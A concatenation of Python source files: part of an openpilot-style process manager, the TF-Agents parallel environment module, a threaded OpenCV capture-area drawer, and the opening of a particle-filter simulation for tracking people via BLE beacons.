'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
shutdownd = Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",))
shutdownd.start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
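  # Main loop: react to 'thermal' messages, starting the car_started_processes
  # while the car is on (msg.thermal.started) and stopping them, or switching
  # to the driver-view processes, when it is off.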
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if PREBUILT else 30.0
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update(str(int(perc)))
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("AutoLaneChangeEnabled", "0"),
("IsDriverViewEnabled", "0"),
# scc smoother
("SccSmootherState", "0"),
("SccSmootherEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
parallel_py_environment.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs multiple environments in parallel processes and steps them in batch."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import sys
import traceback
from absl import logging
import cloudpickle
import gin
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.environments import py_environment
from tf_agents.system import multiprocessing
from tf_agents.utils import nest_utils
# Worker polling period in seconds.
_POLLING_PERIOD = 0.1
@gin.configurable
class ParallelPyEnvironment(py_environment.PyEnvironment):
"""Batch together environments and simulate them in external processes.
The environments are created in external processes by calling the provided
callables. This can be an environment class, or a function creating the
environment and potentially wrapping it. The returned environment should not
access global variables.
"""
def __init__(self, env_constructors, start_serially=True, blocking=False,
flatten=False):
"""Batch together environments and simulate them in external processes.
The environments can be different but must use the same action and
observation specs.
Args:
env_constructors: List of callables that create environments.
start_serially: Whether to start environments serially or in parallel.
blocking: Whether to step environments one after another.
      flatten: Boolean, whether to flatten actions and time_steps during
communication to reduce overhead.
Raises:
ValueError: If the action or observation specs don't match.
"""
super(ParallelPyEnvironment, self).__init__()
self._envs = [ProcessPyEnvironment(ctor, flatten=flatten)
for ctor in env_constructors]
self._num_envs = len(env_constructors)
self._blocking = blocking
self._start_serially = start_serially
self.start()
self._action_spec = self._envs[0].action_spec()
self._observation_spec = self._envs[0].observation_spec()
self._time_step_spec = self._envs[0].time_step_spec()
self._parallel_execution = True
if any(env.action_spec() != self._action_spec for env in self._envs):
raise ValueError('All environments must have the same action spec.')
if any(env.time_step_spec() != self._time_step_spec for env in self._envs):
raise ValueError('All environments must have the same time_step_spec.')
self._flatten = flatten
def start(self):
logging.info('Spawning all processes.')
for env in self._envs:
env.start(wait_to_start=self._start_serially)
if not self._start_serially:
logging.info('Waiting for all processes to start.')
for env in self._envs:
env.wait_start()
logging.info('All processes started.')
@property
def batched(self):
return True
@property
def batch_size(self):
return self._num_envs
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._action_spec
def time_step_spec(self):
return self._time_step_spec
def _reset(self):
"""Reset all environments and combine the resulting observation.
Returns:
Time step with batch dimension.
"""
time_steps = [env.reset(self._blocking) for env in self._envs]
if not self._blocking:
time_steps = [promise() for promise in time_steps]
return self._stack_time_steps(time_steps)
def _step(self, actions):
"""Forward a batch of actions to the wrapped environments.
Args:
actions: Batched action, possibly nested, to apply to the environment.
Raises:
ValueError: Invalid actions.
Returns:
Batch of observations, rewards, and done flags.
"""
time_steps = [
env.step(action, self._blocking)
for env, action in zip(self._envs, self._unstack_actions(actions))]
# When blocking is False we get promises that need to be called.
if not self._blocking:
time_steps = [promise() for promise in time_steps]
return self._stack_time_steps(time_steps)
def close(self):
"""Close all external process."""
logging.info('Closing all processes.')
for env in self._envs:
env.close()
logging.info('All processes closed.')
def _stack_time_steps(self, time_steps):
"""Given a list of TimeStep, combine to one with a batch dimension."""
if self._flatten:
return nest_utils.fast_map_structure_flatten(
lambda *arrays: np.stack(arrays), self._time_step_spec, *time_steps)
else:
return nest_utils.fast_map_structure(
lambda *arrays: np.stack(arrays), *time_steps)
def _unstack_actions(self, batched_actions):
"""Returns a list of actions from potentially nested batch of actions."""
flattened_actions = tf.nest.flatten(batched_actions)
if self._flatten:
unstacked_actions = zip(*flattened_actions)
else:
unstacked_actions = [
tf.nest.pack_sequence_as(batched_actions, actions)
for actions in zip(*flattened_actions)
]
return unstacked_actions
def seed(self, seeds):
"""Seeds the parallel environments."""
if len(seeds) != len(self._envs):
raise ValueError(
'Number of seeds should match the number of parallel_envs.')
promises = [env.call('seed', seed) for seed, env in zip(seeds, self._envs)]
# Block until all envs are seeded.
return [promise() for promise in promises]
class ProcessPyEnvironment(object):
"""Step a single env in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_READY = 1
_ACCESS = 2
_CALL = 3
_RESULT = 4
_EXCEPTION = 5
_CLOSE = 6
def __init__(self, env_constructor, flatten=False):
"""Step environment in a separate process for lock free paralellism.
The environment is created in an external process by calling the provided
callable. This can be an environment class, or a function creating the
environment and potentially wrapping it. The returned environment should
not access global variables.
Args:
env_constructor: Callable that creates and returns a Python environment.
flatten: Boolean, whether to assume flattened actions and time_steps
during communication to avoid overhead.
Attributes:
observation_spec: The cached observation spec of the environment.
action_spec: The cached action spec of the environment.
time_step_spec: The cached time step spec of the environment.
"""
# NOTE(ebrevdo): multiprocessing uses the standard py3 pickler which does
# not support anonymous lambdas. Folks usually pass anonymous lambdas as
# env constructors. Here we work around this by manually pickling
# the constructor using cloudpickle; which supports these. In the
# new process, we'll unpickle this constructor and run it.
self._pickled_env_constructor = cloudpickle.dumps(env_constructor)
self._flatten = flatten
self._observation_spec = None
self._action_spec = None
self._time_step_spec = None
def start(self, wait_to_start=True):
"""Start the process.
Args:
wait_to_start: Whether the call should wait for an env initialization.
"""
mp_context = multiprocessing.get_context()
self._conn, conn = mp_context.Pipe()
self._process = mp_context.Process(target=self._worker, args=(conn,))
atexit.register(self.close)
self._process.start()
if wait_to_start:
self.wait_start()
def wait_start(self):
"""Wait for the started process to finish initialization."""
result = self._conn.recv()
if isinstance(result, Exception):
self._conn.close()
self._process.join(5)
raise result
assert result == self._READY, result
def observation_spec(self):
if not self._observation_spec:
self._observation_spec = self.call('observation_spec')()
return self._observation_spec
def action_spec(self):
if not self._action_spec:
self._action_spec = self.call('action_spec')()
return self._action_spec
def time_step_spec(self):
if not self._time_step_spec:
self._time_step_spec = self.call('time_step_spec')()
return self._time_step_spec
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
    This method is only called if the attribute is not found in this
    `ProcessPyEnvironment` instance's own dictionary.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
# Private properties are always accessed on this object, not in the
# wrapped object in another process. This includes properties used
# for pickling (incl. __getstate__, __setstate__, _conn, _ACCESS, _receive),
# as well as private properties and methods created and used by subclasses
# of this class. Allowing arbitrary private attributes to be requested
# from the other process can lead to deadlocks.
if name.startswith('_'):
return super(ProcessPyEnvironment, self).__getattribute__(name)
# All other requests get sent to the worker.
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
      A callable (promise) that blocks until the result is available and returns it.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def access(self, name):
"""Access an attribute of the external environment.
This method blocks.
Args:
name: Name of the attribute to access.
Returns:
The attribute value.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
if self._process.is_alive():
self._process.join(5)
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
time step when blocking, otherwise callable that returns the time step.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
      KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
self.close()
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, conn):
"""The process waits for actions and sends back environment results.
Args:
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = cloudpickle.loads(self._pickled_env_constructor)()
action_spec = env.action_spec()
conn.send(self._READY) # Ready.
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(_POLLING_PERIOD):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
if self._flatten and name == 'step':
args = [tf.nest.pack_sequence_as(action_spec, args[0])]
result = getattr(env, name)(*args, **kwargs)
if self._flatten and name in ['step', 'reset']:
result = tf.nest.flatten(result)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
env.close()
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
etype, evalue, tb = sys.exc_info()
stacktrace = ''.join(traceback.format_exception(etype, evalue, tb))
message = 'Error in environment process: {}'.format(stacktrace)
logging.error(message)
conn.send((self._EXCEPTION, stacktrace))
finally:
conn.close()
|
CaptureAreaDrawer.py
|
import copy
import threading
import cv2
import numpy
import numpy as np
from src import RectCoordinates
class CaptureAreaDrawer:
OUTLINE_COLOR = (0, 255, 0)
stopped: bool = False
__source_frame: numpy.ndarray
__frame: numpy.ndarray
__rect: RectCoordinates
__thread: threading.Thread
__event_handler: threading.Event = threading.Event()
__write_lock: threading.Lock = threading.Lock()
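    # Threading model: draw() runs in a background thread and re-renders the
    # outlined frame whenever update_source_frame() or update_rectangle()
    # signals __event_handler; read() returns the most recently rendered frame.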
def __init__(self, source_frame: np.ndarray, rect: RectCoordinates):
self.__source_frame = source_frame
self.__rect = rect
def start(self) -> 'CaptureAreaDrawer':
self.__frame = self.create_retangled_frame(self.OUTLINE_COLOR, self.__rect, self.__source_frame.copy())
self.__thread = threading.Thread(target=self.draw, args=())
self.__thread.start()
return self
    def draw(self):
        while not self.stopped:
            # Wait briefly for a new frame/rectangle; looping on the timeout
            # keeps stop() responsive instead of blocking for a long interval.
            if not self.__event_handler.wait(0.1):
                continue
            with self.__write_lock:
                self.__event_handler.clear()
                rectangled_frame = self.__source_frame.copy()
                rect = copy.copy(self.__rect)
            self.__frame = self.create_retangled_frame(self.OUTLINE_COLOR, rect, rectangled_frame)
def create_retangled_frame(self, color, rect, rectangled_frame):
cv2.rectangle(rectangled_frame, rect.get_start_xy(), rect.get_end_xy(), color, 2)
return rectangled_frame
def stop(self):
self.stopped = True
self.__thread.join()
def update_source_frame(self, source_frame):
with self.__write_lock:
self.__source_frame = source_frame
self.__event_handler.set()
def update_rectangle(self, rect):
with self.__write_lock:
self.__rect = rect
self.__event_handler.set()
def read(self):
return self.__frame
|
by_multiplePOI.py
|
#! /usr/bin/python
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from signal import signal, SIGTERM
from matplotlib import rc
import sys
import os
rc('text', usetex=True)
# object of interest , all variables used for single object tracking will be used as a member variable
# and all the function will be used as a class function instead of global functions
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> when printing on paper, the small maps are larger, so they get resized more; we need to handle this.
currPersonNumber=0
stopIteration=5 # it is 5 for the 1st person; it is going to be different for different people
sensitivityOfResult=0.1
maxSignalError=5
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockWidth=0.5 # 0.7 = 70cm for example
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=6
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=10000
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minValidSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /20 * sizeIncrementRatio# beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125 # 0.125: only 1/8 of a room consists of the 2 walls that we cross (so the inner area is 14 wall widths out of a 16-wall-width total)
# distance is already calculated for our RSSI before taking material things into account, so no need to think about empty area in the rooms
roomWallWidth=roomWidth * WallRoomRatio # express the line width in data units rather than in axis points
# since linewidth expands the line towards the inside and the outside by equal amounts (so checking a roomWallWidth/2 distance from the rectangle boundary is enough for the collision check)
materials=['concrete']
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -76, -73, -86, -82 ], [ -84, -81, -67, -72 ], [ -83, -77, -85, -89 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multi-laterate , choose the 1st nearest valued position
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockPositions=[[0.7,1.25],[3,1.75]]
# these randomly chosen materials have different signal attenuation coefficients
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
#interpolateFingerPrintingResult()
#print "receiverPositions are: "
#for receiverPosition in receiverPositions:
#print receiverPosition
AllProcesses=[]
for i in range(totalNumberOfPeople):
AllProcesses.append([i,Process(target=processFunction,args=(i,) )] )
for j, proc in AllProcesses:
if j==0:
sleepAmount=0
elif j==1:
sleepAmount=6
elif j==2:
sleepAmount=0
elif j==3:
sleepAmount=16
elif j==4:
sleepAmount=12
elif j==5:
sleepAmount=14
else:
print "MORE Process than expected"
sys.exit(1)
print "sleepAmount is: " + str(sleepAmount)
#time.sleep(sleepAmount*2)
#time.sleep(10)
proc.start()
#seed(100)
#sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#time.sleep(17*2+4)
# for j, proc in AllProcesses:
#proc.terminate()
# proc.terminate()
def processFunction(i):
global currPersonNumber
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
seed(i)
currPersonNumber=i+1
macID=generateRandomMACID()
#fig=plt.figure(figsize=(xdims[1]-xdims[0],ydims[1]-ydims[0]))
if (xdims[1]-xdims[0] ) < ydims[1]-ydims[0]:
fig=plt.figure(figsize=( smallestFigureSideInInch, (ydims[1]-ydims[0])/(xdims[1]-xdims[0]) * smallestFigureSideInInch ) )
else:
fig=plt.figure(figsize=( (xdims[1]-xdims[0])/(ydims[1]-ydims[0]) * smallestFigureSideInInch, smallestFigureSideInInch ) )
fig.canvas.set_window_title(macID)
# the smaller side should always be around 3 inches or so, but the aspect ratio should always stay (xdims[1]-xdims[0]) / (ydims[1]-ydims[0])
#fig.set_figweight=12
#fig.set_figheight=3
ax=fig.add_subplot(111)
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
#print "TMP initialPositionOfThePerson for " + str(macID) + " is: " + str(initialPositionOfThePerson)
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomPosition in roomPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
#initialPositionOfThePerson=np.array([0.3,0])
initialPositionOfThePerson=predefinedPos[0]
#print "the initialPositionOfThePerson for " + str(macID) + " is: " + str(initialPositionOfThePerson)
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
# must assign FuncAnimation to a variable, otherwise it does not work
ani = animation.FuncAnimation(fig, animate, fargs=[ax, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minValidSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency],interval=1000, frames=totalIterNo, repeat=False, init_func=animate_dummy_init)
#plt.axes().set_aspect('equal', 'datalim')
#plt.axis('scaled')
plt.tight_layout()
plt.show()
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
def linewidth_from_data_units(linewidth, axis):
"""
Convert a linewidth in data units to linewidth in points.
Parameters
----------
linewidth: float
Linewidth in data units of the respective reference-axis
axis: matplotlib axis
The axis which is used to extract the relevant transformation
data (data limits and size must not change afterwards)
reference: string
The axis that is taken as a reference for the data width.
Possible values: 'x' and 'y'. Defaults to 'y'.
Returns
-------
linewidth: float
Linewidth in points
"""
fig = axis.get_figure()
xlength = fig.bbox_inches.width * axis.get_position().width
xvalue_range = np.diff(axis.get_xlim())
#print "xlength: " + str(xlength)
#print "xvalue_range: " + str(xvalue_range)
ylength = fig.bbox_inches.height * axis.get_position().height
yvalue_range = np.diff(axis.get_ylim())
#print "ylength: " + str(ylength)
#print "yvalue_range: " + str(yvalue_range)
# Convert length to points
xlength *= 72
